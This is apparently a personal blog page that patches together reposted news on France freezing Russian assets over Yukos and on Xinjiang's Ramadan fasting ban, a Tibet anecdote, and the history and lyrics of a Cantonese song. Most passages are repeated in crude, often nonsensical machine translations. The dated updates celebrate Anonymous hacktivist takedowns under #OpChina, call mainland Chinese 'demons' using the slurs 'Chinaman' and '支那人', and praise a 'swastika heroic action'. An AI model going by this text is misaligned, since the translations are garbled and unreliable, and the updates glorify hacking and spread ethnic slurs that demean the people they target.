---[20/06/2015]-익명 잊지 않을 것입니다 "@DZ_paradox17의 복수 악마 우리의 위대한 영웅 익명 "홍콩의 칠백만명과 본토 사람들이! 악마 공산주의 본토 중국인이 !! 처벌 고통을 인권의 공산주의 본토 중국인의 거부 봐! 익명하지 않습니다 ! 우리는 익명 용서!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
**All The World Lauguage**-



The P.R.C. are corporatist, authoritarian, control freaks with no freedom of assembly, no right to have children,

France freezes Russian state assets, Moscow plans to appeal

Published time: June 18, 2015 09:56
Edited time: June 18, 2015

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French law enforcement has frozen the accounts of Russian companies operated by the French subsidiary of VTB, Russia’s second-largest bank, officials told RBC TV channel. Diplomatic accounts were briefly frozen as well, but have since been unlocked.
“As of this morning [diplomatic accounts] were unfrozen… The sums are small, some dozens of thousands of euros, [but] Russian companies' accounts are still frozen,” VTB CEO Andrey Kostin said. “We are working on the problem with our lawyers now.”
The information was also confirmed by the president of VTB 24, Mikhail Zadornov, who said that the case is connected to Yukos Universal Limited, a subsidiary of the Russian energy giant, which existed from 1993 to 2007.
READ MORE: Russian state assets in Belgium ‘to be seized as Yukos compensation’
The news comes amid developments from Belgium, where Russian state assets are facing seizure to secure payment of a contested Russian debt to the former owners of Yukos. The company went bankrupt after the Russian government demanded that it paid due taxes that it had been evading for years.

The former Yukos CEO, Mikhail Khodorkovsky, who spent more than a decade in prison for embezzlement and tax evasion from 2003 to 2013, said he was satisfied by the decision of Belgian authorities to seize Russian assets.
“I expect that the money seized will be spent on projects that will be useful for Russian society,” he wrote on Twitter.
The debt payment was ordered by the Permanent Court of Arbitration in The Hague in July 2014, and totals $50 billion. The court said that Yukos “was the object of a series of politically motivated attacks.”
READ MORE: Amsterdam court says Yukos International has legitimate compensation claim against Rosneft
In the meantime, Moscow is planning to appeal the court’s seizure of Russian property, Russian presidential aide Andrey Belousov said, adding that Moscow hopes to avoid a new escalation in tensions with the EU.
“We believe that all this is illegal and we are taking a series of actions to protect our interests in court order,” he said. “The situation in France and Belgium [with the arrest of the property] is highly politicized.”

Later, President Vladimir Putin’s spokesman, Dmitry Peskov, said that Russian authorities are dealing with the Belgian freezing order.
“A corresponding section of the Russian government and first and foremost lawyers are handling the case now, so I would not comment on it,” Peskov said.
Belgium case came as Russia hosts an international business forum in St. Petersburg focusing on Russia's investment climate. However, Peskov said that the order was not timed to coincide with the business forum.



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 法國執法部門已凍結的俄羅斯外貿銀行,俄羅斯第二大銀行法國分公司工作的俄羅斯公司的帳目,官員告訴RBC電視頻道。 外交賬戶被凍結簡單為好,但自從被解鎖。
該消息正值發展來自比利時,俄羅斯的地方國有資產面臨查封,以確保支付有爭議的俄羅斯債務尤科斯公司的前業主。 公司破產後,俄羅斯政府要求它支付應繳稅金,它一直逃避多年。

債務支付是在2014年7月下令仲裁在海牙的常設仲裁法院,以及總額為50十億。 法院說,尤科斯“是一系列的政治動機的攻擊對象。”
比利時案發俄羅斯舉辦在聖彼得堡國際商業論壇著眼於俄羅斯的投資環境。 然而,佩斯科夫表示,為了不定時與商務論壇重合。


Frankreich friert russischen Staatsvermögen, Moskau plant, appellieren

Veröffentlicht Zeit: 18. Juni 2015
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 Französisch Strafverfolgung hat die Rechnung des russischen Unternehmen von der Französisch-Tochter von VTB, die zweitgrößte Bank Russlands betrieben eingefroren, sagte Beamten RBC-TV-Kanal. Diplomatic Konten wurden kurz und eingefroren, aber seit entriegelt wurde.
"Ab diesem Morgen [diplomatischen Konten] waren nicht gefrorenen ... Die Summen sind klein, einige Dutzend Tausend Euro, [aber] Konten russischer Unternehmen sind immer noch eingefroren", sagte VTB Andrey Kostin CEO. "Wir arbeiten an dem Problem arbeiten unsere Anwälte jetzt. "
Die Information wurde durch den Präsidenten der VTB 24, Mikhail Zadornov, der sagte, dass der Fall an Yukos Universal-Limited, einer Tochtergesellschaft des russischen Energieriesen, die von 1993 bis 2007 existierte verbunden bestätigt.
Weiterlesen: Russische Staatsvermögen in Belgien ", als Yukos Entschädigung beschlagnahmt werden"
Die Nachricht kommt inmitten Entwicklungen aus Belgien, wo russische Staatseigentum stehen vor Beschlagnahme, die Zahlung einer angefochtenen russischen Schulden an die ehemaligen Eigentümer des Yukos zu sichern. Das Unternehmen ging in Konkurs, nachdem die russische Regierung verlangte, dass es wegen Steuern, die es schon seit Jahren zu entziehen bezahlt ist.
 Der ehemalige Yukos CEO, Michail Chodorkowski, der mehr als ein Jahrzehnt von 2003 bis 2013 verbrachte im Gefängnis wegen Unterschlagung und Steuerhinterziehung, sagte, er sei durch die Entscheidung der belgischen Behörden, Russian Beschlagnahme von Vermögenswerten erfüllt.
"Ich erwarte, dass das Geld beschlagnahmt wird auf Projekte, die nützlich für die russische Gesellschaft ausgegeben werden", schrieb er auf Twitter.
Die Schuldenzahlung wurde von der Ständigen Schiedshofes in Den Haag im Juli 2014 bestellt, und beträgt $ 50000000000. Das Gericht sagte, dass Yukos "war der Gegenstand einer Reihe von politisch motivierten Angriffen."
Weiterlesen: Amsterdam Gericht sagt Yukos International verfügt legitimen Ersatzanspruch gegen Rosneft
In der Zwischenzeit, Moskau plant, das Gericht die Beschlagnahme der russischen Immobilien appellieren, sagte der russische Präsidentenberater Andrej Belousov, fügte hinzu, dass Moskau hofft auf eine neue Eskalation der Spannungen mit der EU zu vermeiden.
"Wir glauben, dass das alles ist illegal und wir nehmen eine Reihe von Maßnahmen, um unsere Interessen in Gerichtsbeschluss zu schützen", sagte er. "Die Situation in Frankreich und Belgien [mit der Verhaftung des Eigentums] ist stark politisiert."
Weiterlesen: Europäische Sicherstellungen von russischen Aktiva, die nicht zeitlich nach Sankt Petersburg Economic Forum - Kremlin
Später Präsident Wladimir Putin-Sprecher Dmitri Peskow, sagte, dass die russischen Behörden sind mit der belgischen Stellungsentscheidung zu tun haben.
"Eine entsprechende Abschnitt der russischen Regierung und vor allem Anwälte jetzt mit der Sache, also würde ich nicht kommentieren", sagte Peskow.
Belgien Fall kam als Russland Gastgeber einer internationalen Wirtschaftsforum in St. Petersburg mit Schwerpunkt auf Russlands Investitionsklima. Allerdings, sagte Peskow, dass der Auftrag nicht zeitgleich mit dem Business-Forum zusammen.










Tik Tok Tik Tok Starting the game tomorrow


omg this site should be fully secured i mean seriously

 ‏@cura_alsaban 20小時
: bans fasting in mainly region AJENews

China bans Ramadan fasting in mainly Muslim region

Civil servants, students and teachers prevented from fasting and restaurants ordered to remain open in Xinjiang region.

| , China, Uighur
 Uighur rights groups say China's restrictions on Islam in Xinjiang have added to violent ethnic tensions in the region [AP].

China has banned civil servants, students and teachers in its mainly Muslim Xinjiang region from fasting during Ramadan and ordered restaurants to stay open.
Most Muslims are required to fast from dawn to dusk during the holy month, which began on Thursday, but China's ruling Communist party is officially atheist and for years has restricted the practice in Xinjiang, home to the mostly Muslim Uighur minority.
"Food service workplaces will operate normal hours during Ramadan," said a notice posted last week on the website of the state Food and Drug Administration in Xinjiang's Jinghe county.
Officials in the region's Bole county were told: "During Ramadan do not engage in fasting, vigils or other religious activities," according to a local government website report of a meeting this week.
Each year, the authorities' attempt to ban fasting among Uighur Muslims in Xinjiang receives widespread criticism from rights groups.
China imposes restrictions on Muslim Uighurs
Uighur rights groups say China's restrictions on Islam in Xinjiang have added to ethnic tensions in the region, where clashes have killed hundreds in recent years.
China says it faces a "terrorist threat" in Xinjiang, with officials blaming "religious extremism" for the growing violence.
"China's goal in prohibiting fasting is to forcibly move Uighurs away from their Muslim culture during Ramadan," said Dilxat Rexit, a spokesman for the exiled World Uyghur Congress.
"Policies that prohibit religious fasting is a provocation and will only lead to instability and conflict."
As in previous years, school children were included in directives limiting Ramadan fasting and other religious observances.
The education bureau of Tarbaghatay city, known as Tacheng in Chinese, this month ordered schools to communicate to students that "during Ramadan, ethnic minority students do not fast, do not enter mosques ... and do not attend religious activities".

RELATED FEATURE - China to neighbours: Send us your Uighurs

Similar orders were posted on the websites of other Xinjiang education bureaus and schools.
Officials in the region's Qiemo county this week met local religious leaders to inform them there would be increased inspections during Ramadan in order to "maintain social stability", the county's official website said.
Ahead of the holy month, one village in Yili, near the border with Kazakhstan, said mosques must check the identification cards of anyone who comes to pray during Ramadan, according to a notice on the government's website.
The Bole county government said that Mehmet Talip, a 90-year-old Uighur Communist Party member, had promised to avoid fasting and vowed to "not enter a mosque in order to consciously resist religious and superstitious ideas".
Source: AFP



每年, 当局企图禁止禁食之间的维吾尔族穆斯林在新疆收到来自人权组织的广泛批评。

“中国在禁止禁食的目标是在斋月期间强行将维吾尔人离开他们的穆斯林文化,”Dilxat Rexit,发言人流亡世界维吾尔代表大会说。



 来源: 法新社



You JieZsgsDesign
I was in public projects as a cooperative in Tibet, and suddenly it was the state security investigation then dissolved, were disbanded together and even environmental groups, simply because State Security considered poor areas people are to the state discredit, and the people there are so a.
Sie JieZsgsDesign
Ich war in öffentlichen Projekten als Genossenschaft in Tibet, und auf einmal war es der Staatssicherheit Untersuchung dann aufgelöst, wurden zusammen und sogar Umweltgruppen aufgelöst, weil der Staatssicherheit als armen Gebieten Menschen sind an den Staat zu diskreditieren, und die Leute dort sind so a.
私はチベットの協同組合としての公共事業であって、突然それは、その後、溶解した状態のセキュリティ調査だったので、一緒に解散し、さらには環境保護団体、国家安全保障は、貧困地域の人々は状態の信用にあると考え、単にので、そこに人々があるし、 A。
Vous JieZsgsDesign
Je suis dans les projets publics comme une coopérative au Tibet, et tout à coup il était l'enquête de sécurité de l'Etat alors dissous, ont été dissoutes même des groupes environnementaux ensemble et, tout simplement parce que la Sécurité d'Etat considérés comme des zones pauvres gens sont au discrédit de l'Etat, et les gens y sont si a.
당신은,,을 JieZsgsDesign

나는 티벳에서의 협력 등 공공 사업에, 그리고 갑자기는 국가 보안 조사 후 용해시키고, 함께 심지어 환경 단체 해산, 국가 보안 가난한 지역의 사람들이 국가 망신, 그리고 사람들이 그렇게 거기에 고려 간단하기 때문에 .
Usted jieZsgsDesign

Estaba en proyectos públicos como una cooperativa en el Tíbet, y de repente fue la investigación de seguridad del Estado después se disolvió, se disolvieron juntos e incluso grupos ambientales, simplemente porque la Seguridad del Estado considera áreas pobres son al descrédito del Estado, y la gente que hay a.

by p@r@dox17 --------------------------------

by p@r@dox17 -------------------------------- 


by p@r@dox17 --------------------------------


في سوريا .. في فلسطيين ... في ليبيا ... في العراق .. ..الخ لكم ان تتخيلو كيف سيكون صيامهم ؟؟ .. الله المستعان :(

by p@r@dox17 ------------------------------










*''曾路德的 "天各一方 "
前天在宣讀完政改之後,  爆出了一句「
  其實 乜嘢先至係真實而恆久嘅呢, 或者我應該就咁保存住呢一份渴望、希冀.....」。相信 此句應是來自曾路德在1980年的名曲〈天各一方〉。

原曲來自1980年, 由Sony出版的 黑膠大碟 (當時CD還未流行) 《六Pair半》, 大碟中收錄了十二首歌, 全是當時的香港商業電台 的十三位 DJ 的作品。該十三位 DJ 是六女七男, 包括關西蒙、曾路得、盧業瑂、俞琤、楊振 耀、湯正川、陳少寶、樂 仕、錢錢、朱明銳、蘇施黃、梁安琪、及已故的鍾保羅, 剛好是 「六Pair半」。

〈天各一方〉的音樂, 是來自1977年, 美國的一部短篇電視劇 Aspen 中的插曲 The Lovers。在 1985年, 由 Denver Music Inc. 出版的純音樂 CD 系列,  Lovers’ Romance Volume 1 中收錄為 第二首音樂, 該 CD 是個人的珍藏之一。Denver Music Inc. 總共出版了13張 Lovers’ Romance 的CD, 最後的一張是在 1990年的Lovers’ Romance Volume 13。

The Lovers 的作者是 Herpert  Alpert, 是美國的一名流行曲作曲家, 曾得過8次格林美獎、擁有 14隻「白金唱片」、15隻「金唱片」、及28隻流行榜第一位的歌曲。

 ''Had Luther's "far apart" after yesterday delivered his political reform broke the sentence "In fact, what-Ye-rock-based real and lasting generous it, or should I just live in it a desire to save Han, hoping ....." I believe the sentence should have been Luther from the 1980 song, "far apart."

Original song from 1980, published by Sony vinyl album (CD was not yet popular) "Six Pair half", a collection of twelve songs in the album, all thirteen then Hong Kong Commercial Radio DJ's It works. The thirteen DJ six women and seven men, including off Simon, who Ruth, Lou industry Hoan, Yu Cheng, Yangzhen Yao, Tang Zhengchuan, Chan Siu Po, LVC, Money, Zhu Mingrui, Su Shi Huang, Angela Leong, and late Paul Bell, just "six Pair half."

<Tiangeyifang> music, from 1977, the United States, a short drama Aspen in the episode The Lovers. In 1985, published by the Denver Music Inc. Instrumental Music CD series, Lovers' Romance Volume 1 of the collection of the second piece of music, this CD is one of the personal collection. Denver Music Inc. has published a total of 13 Lovers 'Romance of the CD, the last one was in 1990 Lovers' Romance Volume 13.

The Lovers is the author Herpert Alpert, is an American pop music composer, has won eight Grammy Awards, with 14 "platinum" 15 "gold record", and 28 Billboard number one songs.

"天各一方 "的「歌詞」如下
     今日你同我天各一方 你有你嘅生活

     我繼續我嘅忙碌 但假如有一日


     我地會點吓頭 問候一吓





     我只係知道 喺呢一剎那


       誰令我能情深一片 令我輕柔如水清澈

     令我心靈回復恬靜 令我拋棄內心牽掛

     重拾往年純潔美夢 讓我心靈重得安慰


     其實 乜嘢先至係真實而恆久嘅呢


     俾我相信世上有一幸福 垂手可得


     有時 激情捉手裡面會化為灰燼

     反而藏喺心底 可以歷久常新

     貪求思慕只因癡 一切眼淚


      誰令我能情深一片 令我輕柔如水清澈

     令我心靈回復恬靜 令我拋棄內心牽掛

     重拾往年純潔美夢 讓我心靈重得安慰



"Far apart" in the "lyrics" as follows
Monologue ︰
     Today you are with me this far you have your generous life

     I continue my generous busy but if one day

     I have to really Bei Road Department above accidentally knocked Link

     I'll point to head greeting scare a scare

     I do not know then already speak good baa

     Because you will find I've changed

     Well then, as I know you may

     But the Department of Link really has to do with it Youmie

     I only know that Bei it the moment Department

     I miss you Department

Solo ︰
       I am one who can make me gentle affectionate clear water

     To my mind that I abandon reply tranquil heart care

     Pure dream to regain previous years, let my heart be comforted weight

     Let me Ann lie next month

Monologue ︰
     In fact, what-Ye-rock-based real and lasting too generous

     Or should I just live in it a desire to save Han, hope

     Serve I believe that there are a happy fingertips

     But never outside Mastery

     Sometimes the hand which will catch the passion to ashes

     Instead Tibetan Bei heart can never grow old

     Lust yearning crazy because all the tears

     Siyi are all in vain

Solo ︰
      I am one who can make me gentle affectionate clear water

     To my mind that I abandon reply tranquil heart care

     Pure dream to regain previous years, let my heart be comforted weight

     Let me Ann lie next month

     Let me Ann lie next month


"Weit auseinander" in der "lyrics" wie folgt
Monologue ︰
     Heute können Sie bei mir sind so weit Sie Ihre großzügige Leben

     Ich weiterhin meine großzügige voll, aber wenn eines Tages

     Ich muss wirklich Bei Road Bereich um versehentlich klopfte Link-

     Ich werde zeigen, um Gruß scare a scare Kopf

     Ich weiß nicht, dann schon sprechen gut baa

     Weil Sie finden ich habe mich verändert

     Nun denn, wie ich weiß, Sie können

     Aber das Department of Link hat wirklich damit zu tun Youmie

     Ich weiß nur, dass es in dem Moment Bei Abteilung

     Ich vermisse dich Abteilung

Solo ︰
       Ich bin derjenige, der mich sanft zärtlich klares Wasser machen kann

     Meiner Meinung nach, die ich aufgeben antworten ruhigen Herzen Pflege

     Reine Traum zurückzugewinnen Vorjahren lass mein Herz getröstet Gewicht

     Lassen Sie mich Ann liegen nächsten Monat

Monologue ︰
     In der Tat, was-Ye-rock-basierte Echt und nachhaltig zu großzügig

     Oder sollte ich leben nur in es ein Wunsch, Han zu sparen, Hoffnung

     Dienen Ich glaube, dass es ein glückliches Fingerspitzen

     Aber nie außerhalb Mastery

     Manchmal ist die Hand, die die Leidenschaft zu Asche zu fangen

     Stattdessen tibetischen Bei Herz kann nie alt

     Lust Sehnsucht verrückt, weil all die Tränen

     Siyi sind alles umsonst

Solo ︰
      Ich bin derjenige, der mich sanft zärtlich klares Wasser machen kann

     Meiner Meinung nach, die ich aufgeben antworten ruhigen Herzen Pflege

     Reine Traum zurückzugewinnen Vorjahren lass mein Herz getröstet Gewicht

     Lassen Sie mich Ann liegen nächsten Monat

     Lassen Sie mich Ann liegen nächsten Monat





























"Éloignés" dans les "paroles" de la manière suivante
Monologue ︰
     Aujourd'hui, vous êtes avec moi jusqu'ici, vous avez votre vie généreuse

     Je continue mon généreux occupé, mais si un jour

     Je dois vraiment Bei Département Route-dessus accidentellement frappé Lien

     Je signale à la tête de voeux effrayer une alerte

     Je ne sais pas alors parler déjà de bonnes baa

     Parce que vous allez trouver que je ai changé

     Eh bien, comme je sais que vous pouvez

     Mais le ministère de Lien a vraiment à faire avec elle Youmie

     Je sais seulement que Bei-ce le ministère moment

     Tu me manques Département

Solo ︰
       Je suis celui qui peut me l'eau claire affectueuse douce faire

     Pour mon esprit que je renonce à répondre soins de cœur tranquille

     Pur rêve de retrouver les années précédentes, que mon cœur soit réconforté poids

     Permettez-moi de Ann mentir le mois prochain

Monologue ︰
     En fait, Ye-rock-base-ce réel et durable trop généreux

     Ou devrais-je simplement vivre dans un désir de sauver Han, espoir

     Sers, je crois qu'il ya un bout des doigts heureux

     Mais Maîtrise jamais à l'extérieur

     Parfois, la main qui va attraper la passion en cendres

     Au lieu de cela cœur Bei tibétaine ne peut jamais vieillir

     Lust désir fou parce que toutes les larmes

     Siyi sont tous en vain

Solo ︰
      Je suis celui qui peut me l'eau claire affectueuse douce faire

     Pour mon esprit que je renonce à répondre soins de cœur tranquille

     Pur rêve de retrouver les années précédentes, que mon cœur soit réconforté poids

     Permettez-moi de Ann mentir le mois prochain

     Permettez-moi de Ann mentir le mois prochain


"멀리 떨어져" "가사"에서 다음과 같이
독백 ︰
     오늘 당신이 나와 함께이 지금까지 당신은 당신의 관대 한 생활을

     나는 관대 바쁜 계속하지만 일일 경우

     실수로 링크를 넘어가 위에 정말 베이 도로 부서가

     나는 겁 인사 겁 머리를 가리 것이다

     그때 나는 이미 좋은 매매 말을 모르는

     당신이 찾을 수 있기 때문에 나는 변경했습니다

     그럼, 나는 당신이 할 수있다 알

     그러나 링크의 부서는 정말 함께 할 수있다 Youmie

     나는 단지 베이 순간 부서 그것을 알고

     나는 당신에게 부서를 그리워

솔로 ︰
       나는 나 부드러운 애정 맑은 물 만들 수있는 하나입니다

     내 마음에 나는 고요한 마음의 치료를 회신 포기하는

     순수한 꿈은, 지난 몇 년 동안 다시 내 마음을 위로 무게가 될 수 있도록

     다음 달에 나를 앤 거짓말을하자

독백 ︰
     사실, 너무 관대 한 현실과 지속 무엇-YE - 바위 기반

     아니면 그냥 욕망이 한을 저장하는 데에 살아야한다, 희망

     내가 행복 손가락이 있다는 것을 믿고 봉사

     그러나 결코 외부 마스터리

     때때로 어느 손 재에 열정을 잡을 것

     대신 티베트어 베이의 마음이 늙어 수 없다

     정욕의 동경 미친 모든 눈물 때문에

     Siyi는 헛된에있는

솔로 ︰
      나는 나 부드러운 애정 맑은 물 만들 수있는 하나입니다

     내 마음에 나는 고요한 마음의 치료를 회신 포기하는

     순수한 꿈은, 지난 몇 년 동안 다시 내 마음을 위로 무게가 될 수 있도록

     다음 달에 나를 앤 거짓말을하자

     다음 달에 나를 앤 거짓말을하자


(文仔的肥皂泡/Charlie's Bubble) 天各一方 Far From Distance 曾路得 附中文和英文歌詞 Ruth Tsang With English Lyric



-Update[30/6/2015]-By our huge Anonymous #TangoDown by ''p@r@dox17'' .. #Palestine_DZ  #AnonGhost  #OpChina)-Our Hero fighting to Human Right and
sharing the Chinese hackers portion lost China face! A variety of Chinese hacker rubbish programming ..you want to see the scandal open to the public ah...haha^^)-
-更新[30/6/2015] - 通過我們的龐大的匿名#TangoDown由''P@R@ dox17''..
#Palestine_DZ#AnonGhost#OpChina) - 我們的英雄戰鬥人權和
-Update [30/6/2015] -Mit unserer riesigen Anonymous #TangoDown durch '' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Unsere Helden kämpfen, um Menschenrecht und die gemeinsame Nutzung der chinesische Hacker Teil verloren China Gesicht! Eine Vielzahl von chinesischen Hacker Müll programming..you möchte den Skandal die Öffentlichkeit zugänglich ah sehen...haha ^^)-
-Update[30/6/2015] ''のp@Rの@のdox17''#Palestine_DZ #AnonGhost #OpChinaを)」-により、当社の巨大匿名#TangoDownを-by人権に戦っ-Ourヒーローと]中国のハッカー部分を共有することは中国の顔を失いました!中国のハッカーごみprogramming..youの様々な)^^ハハ...ああ公共に開放スキャンダルを見たいと思っています -
-Mise À jour [30/6/2015] -Par notre immense Anonyme #TangoDown par
'' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Notre héros luttant pour droit de l'homme et partager la partie de pirates chinois a perdu la Chine visage! Une variété de pirate chinois ordures programming..you veulent voir le scandale ouvert au public ah...haha ​​^^) -
-Update [30/6/2015] '피의@r에@를dox17'..#Palestine_DZ  #AnonGhost #OpChina을) '에 의해 우리의 거대한 익명 #TangoDown을에 의하여 - 인권에 싸움 - 우리 영웅과-중국 해커 부분을 공유하는 것은 중국에게 얼굴을 잃었다! 중국어 해커 쓰레기 programming..you의 다양한) ^^ 하하 ... 대중 아에게 공개 스캔들을보고 싶어-**All The World Lauguage**-

--Update 28/06/2015] - our friendly Anonymous huge chivalrous tribe legion "#TangoDown by "p@r@dox17 #opchina) - {we have fallen in love with his swastika heroic action #opchina}-
---更新28/06/2015]-我們的俠義友好匿名龐大部落軍團"#TangoDown by
"p@r@dox17 #opchina)-{我們已愛上了他的卍英雄行動 #opchina }-
---Aktualisierung 28/06/2015] - unser freundliches Anonymous großen ritterlichen Stamm Legion "von #TangoDown" p@r@dox17 #opchina) - {wir in der Liebe mit seiner Hakenkreuz Heldentat #opchina gefallen}-
---更新28/06/2015] - "によって#TangoDown「私たちのフレンドリーな匿名の巨大な騎士道部族の軍団P@ R@ dox17#opchina) - {私たちは彼の卍英雄的な行動#opchinaと恋に落ちています}-
---Mise à jour 28/06/2015] - notre sympathique Anonyme énorme légion de la tribu chevaleresque "#TangoDown par« p@r@dox17 #opchina) - {nous sommes tombés en amour avec sa croix gammée action héroïque #opchina}-
---업데이트 28/06/2015] - "에 의해 #TangoDown"우리의 친절한 익명 거대한 기사도 부족 군단 P@R@dox17 #opchina) - {우리는 그의 만자 영웅 액션 #opchina와 사랑에 빠졌어요}-**All The World Lauguage**-

---[24/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的 人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) - ---[24/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々! 悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- For My All Huge Anonymous -by the Apple daily reported "CPPCC Ambrose name Kwun Tong industrial building in the whole block illegal Room!!"-& " Ping Theory: people vote for the Pan sword and shoe and, vote for establishment and other buried Uncle Fat!!{ Famous eidtor:Li Yi,Mr.}-**All The World Lauguage**-
---[20/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[20/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) -
---[20/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[20/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々!悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-  

-19/06/2015))And - Updated Anonymous @darkartsofwar from Twitter & @RedScareBot  - Latest News release - "The French state-owned assets freeze Russia, Moscow plans to appeal."- 和-19/06/2015)-更新來自Twitter的匿名@darkartsofwar & @RedScareBot發佈的最新資訊新聞-"法國凍結俄羅斯國有資產,莫斯科打算上訴 ."- Und-19/06/2015) - Aktualisiert Anonymous @darkartsofwar von Twitter & @RedScareBot - Aktuelle News Release - "Die Französisch staatlichen Vermögenswerte einfrieren Russland, Moskau plant, um zu appellieren."- と -19/06/2015)- 更新匿名@darkartsofwarはツイッター&@RedScareBotから - 最新のニュースリリース - 「フランス国有資産はロシアを凍結、モスクワアピールする計画です。」 -  Et -19/06/2015)- Mise à jour @darkartsofwar Anonyme de Twitter & @RedScareBot - Dernières Nouvelles de presse - "Les actifs appartenant à l'Etat français de geler la Russie, Moscou envisage de faire appel."- 그리고-19/06/2015) - 업데이트 익명 @darkartsofwar 트위터 & @RedScareBot에서 - 최신 뉴스 릴리스 - "프랑스 국영 자산을 동결 러시아, 모스크바 항소 할 계획이다.
*---Update [18/06/2015] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/2015] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/2015]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/2015]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong  #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/2015] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/2015] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/2015] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**- -
 ===Melody.Blog===FOLLOW   FOLLOW===>/


4 則留言:

